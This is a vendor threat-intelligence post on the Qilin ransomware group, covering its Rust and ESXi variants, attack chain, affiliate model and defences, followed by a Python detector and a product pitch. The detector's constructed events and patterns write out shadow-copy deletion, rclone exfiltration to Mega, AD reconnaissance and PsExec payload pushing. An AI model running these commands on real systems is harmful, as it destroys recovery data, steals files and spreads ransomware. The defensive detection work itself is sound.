The Rise of Qilin
Qilin — also tracked as Agenda — emerged in late 2022 and has steadily climbed the ranks of active ransomware operations. By early 2025, Qilin consistently appeared in the top ten most prolific ransomware groups by victim count, with a particular appetite for healthcare organizations, manufacturing firms, and government entities.
Unlike many RaaS operations that rely on volume and opportunism, Qilin demonstrates a level of targeting discipline that suggests experienced operators. They select victims deliberately, perform extensive reconnaissance before deploying ransomware, and calibrate ransom demands based on the victim's perceived ability to pay.
Technical Architecture
Qilin ransomware is cross-platform by design. The group maintains both Windows and Linux variants, with the Linux version specifically targeting VMware ESXi hypervisors — a choice that reflects the growing importance of virtualization infrastructure in enterprise environments.
Windows Variant
The Windows payload is written in Rust, a language choice increasingly popular among ransomware developers for its memory safety guarantees and difficulty of reverse engineering. The binary supports configurable encryption parameters:
- File encryption uses ChaCha20 with RSA-4096 key encapsulation
- Operators can configure which file extensions to target or skip
- Volume shadow copies are deleted using vssadmin and wmic
- The ransomware can propagate across SMB shares when configured to do so
Linux/ESXi Variant
The Linux variant targets ESXi environments specifically. It enumerates running virtual machines, terminates them to release file locks, then encrypts the underlying VMDK files. This approach maximizes impact because a single ESXi host often runs dozens of production virtual machines.
The encryption of VM disk files is particularly devastating because it bypasses any security controls running inside the guest operating systems. The VMs do not need to be compromised individually — the hypervisor-level attack renders them all inaccessible simultaneously.
Attack Chain Analysis
Qilin's typical attack progression follows a well-established pattern with some distinctive characteristics:
Initial Access
Qilin affiliates primarily gain access through compromised VPN credentials and exploited public-facing applications. In 2024, they were observed exploiting vulnerabilities in Citrix NetScaler, Fortinet FortiGate, and Ivanti Connect Secure appliances — often within days of public disclosure.
They also leverage initial access brokers (IABs) who sell pre-established footholds into corporate networks. This division of labor allows Qilin operators to focus on post-exploitation rather than the noisy work of initial compromise.
Reconnaissance and Lateral Movement
Once inside, Qilin operators spend considerable time mapping the environment. They use standard tools — nltest, net group, adfind — to enumerate Active Directory structure, identify domain controllers, and locate high-value targets like file servers and database systems.
Lateral movement typically leverages compromised domain administrator credentials obtained through Mimikatz, LSASS dumping, or Kerberoasting attacks. The operators show patience, sometimes maintaining access for weeks before deploying ransomware.
Data Exfiltration
Before encryption, Qilin exfiltrates significant volumes of data. They favor tools like rclone configured to upload to Mega.nz or other cloud storage providers. The exfiltrated data serves as leverage in their double extortion model and is eventually published on their Tor-based leak site if the victim does not pay.
Deployment
Ransomware deployment is typically coordinated to occur outside business hours. The operators use Group Policy Objects (GPOs) or PsExec to distribute the payload across the network simultaneously, maximizing the blast radius before anyone can respond.
Victim Selection and Impact
Qilin's targeting of healthcare organizations is particularly concerning. Hospitals and health systems face unique pressure to pay ransoms because downtime directly impacts patient care. The group appears to understand this leverage and has repeatedly targeted healthcare entities despite the ethical implications.
Manufacturing firms represent another favored target. Production downtime costs these organizations significant revenue per hour, creating urgency to restore operations — which often means paying the ransom.
Government entities, educational institutions, and professional services firms round out Qilin's victim portfolio. The group generally avoids targets in Commonwealth of Independent States (CIS) countries, suggesting operators or leadership based in or aligned with that region.
Ransomware-as-a-Service Model
Qilin operates a RaaS program with a relatively generous affiliate split — reports suggest affiliates retain 80-85% of ransom payments, with the core group taking the remainder. This competitive commission structure helps attract skilled affiliates from other ransomware operations.
The group provides affiliates with:
- A builder that generates customized payloads for each target
- A management panel for tracking victims and negotiations
- A dedicated leak site for publishing stolen data
- Technical support for deployment and troubleshooting
Defensive Strategies
Protecting against Qilin requires addressing their primary attack vectors:
Patch public-facing appliances immediately. Qilin affiliates exploit known vulnerabilities rapidly. VPN concentrators, firewalls, and remote access gateways need priority patching.
Implement MFA everywhere. Stolen credentials are the most common initial access vector. Multi-factor authentication on VPN, email, and administrative interfaces eliminates the easiest path in.
Secure ESXi infrastructure. If you run VMware environments, ensure ESXi hosts are patched, management interfaces are not exposed to the network, and you have offline backups of critical VM configurations.
Monitor for lateral movement indicators. Large-scale use of PsExec, unusual LDAP queries, and Kerberoasting attempts should trigger immediate investigation.
Segment and protect backups. Offline or immutable backups are the single most important recovery control. Qilin operators specifically hunt for and destroy accessible backup infrastructure.
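As an added example that is not part of the original article, the following detector runs over constructed Windows process-creation events and flags several of the Qilin behaviours described above: shadow copy deletion with vssadmin or wmic, rclone uploads to a Mega remote, Active Directory enumeration with nltest, net group and adfind, and PsExec fan-out to many hosts within a short window. The event format, rule names, threshold and window size, and every host name and command line are my own assumptions, not observed indicators.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
# Constructed process-creation events (Sysmon Event ID 1 style); not real telemetry.
EVENTS = [
    {"ts": "2025-03-01T01:02:00", "host": "WS01", "cmd": "nltest /dclist:corp.local"},
    {"ts": "2025-03-01T01:03:10", "host": "WS01", "cmd": 'net group "Domain Admins" /domain'},
    {"ts": "2025-03-01T02:10:00", "host": "FS01", "cmd": "rclone copy D:\\Finance mega:archive"},
    {"ts": "2025-03-01T02:40:00", "host": "DC01", "cmd": "PsExec.exe \\\\SRV01 -s -d C:\\Temp\\x.exe"},
    {"ts": "2025-03-01T02:40:05", "host": "DC01", "cmd": "PsExec.exe \\\\SRV02 -s -d C:\\Temp\\x.exe"},
    {"ts": "2025-03-01T02:40:09", "host": "DC01", "cmd": "PsExec.exe \\\\SRV03 -s -d C:\\Temp\\x.exe"},
    {"ts": "2025-03-01T02:41:00", "host": "SRV01", "cmd": "vssadmin delete shadows /all /quiet"},
    {"ts": "2025-03-01T02:41:02", "host": "SRV02", "cmd": "wmic shadowcopy delete"},
    {"ts": "2025-03-01T09:00:00", "host": "WS07", "cmd": "vssadmin list shadows"},  # benign: lists, does not delete
]

# Single-event rules for TTPs named in the article (rule names are my own).
SINGLE_EVENT_RULES = [
    ("shadow_copy_deletion", re.compile(r"vssadmin\s+delete\s+shadows|wmic\s+shadowcopy\s+delete", re.I)),
    ("rclone_to_mega", re.compile(r"\brclone\b.*\bmega:", re.I)),
    ("ad_recon", re.compile(r'nltest\s+/dclist|net\s+group\s+"domain admins"|\badfind\b', re.I)),
]
# PsExec invocations: capture the remote target (\\HOST); fan-out is judged per source host.
PSEXEC_RE = re.compile(r"psexec(?:64)?(?:\.exe)?\s+\\\\([\w.-]+)", re.I)
FANOUT_THRESHOLD, FANOUT_WINDOW = 3, timedelta(minutes=10)  # distinct targets within the window

def detect(events):
    """Return (rule, source_host, detail) findings for the given events."""
    findings = []
    psexec_hits = defaultdict(list)  # source host -> [(timestamp, target host)]
    for ev in events:
        for name, rx in SINGLE_EVENT_RULES:
            if rx.search(ev["cmd"]):
                findings.append((name, ev["host"], ev["cmd"]))
        m = PSEXEC_RE.search(ev["cmd"])
        if m:
            psexec_hits[ev["host"]].append((datetime.fromisoformat(ev["ts"]), m.group(1)))
    # Sliding window: flag a source that reaches N distinct targets within the window.
    for src, hits in psexec_hits.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):
            targets = {tgt for t, tgt in hits[i:] if t - t0 <= FANOUT_WINDOW}
            if len(targets) >= FANOUT_THRESHOLD:
                findings.append(("psexec_fanout", src, f"{len(targets)} hosts: {sorted(targets)}"))
                break
    return findings

if __name__ == "__main__":
    for rule, host, detail in detect(EVENTS):
        print(f"{rule:22} {host:6} {detail}")
```

The single-event rules are deliberately narrow (a `vssadmin list shadows` from an administrator is not flagged); the fan-out rule is what separates routine PsExec use from the simultaneous network-wide push described in the Deployment section.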
How Safeguard.sh Helps
Qilin's exploitation of known vulnerabilities in public-facing appliances underscores the need for comprehensive vulnerability visibility. Safeguard continuously monitors your software components and dependencies, flagging known vulnerabilities before attackers can exploit them. By maintaining a real-time SBOM, Safeguard ensures you know exactly which systems run affected software when a new CVE drops — whether it is a Citrix appliance, a VMware component, or an open source library. This speed of identification is the difference between patching before Qilin arrives and discovering the exposure during incident response.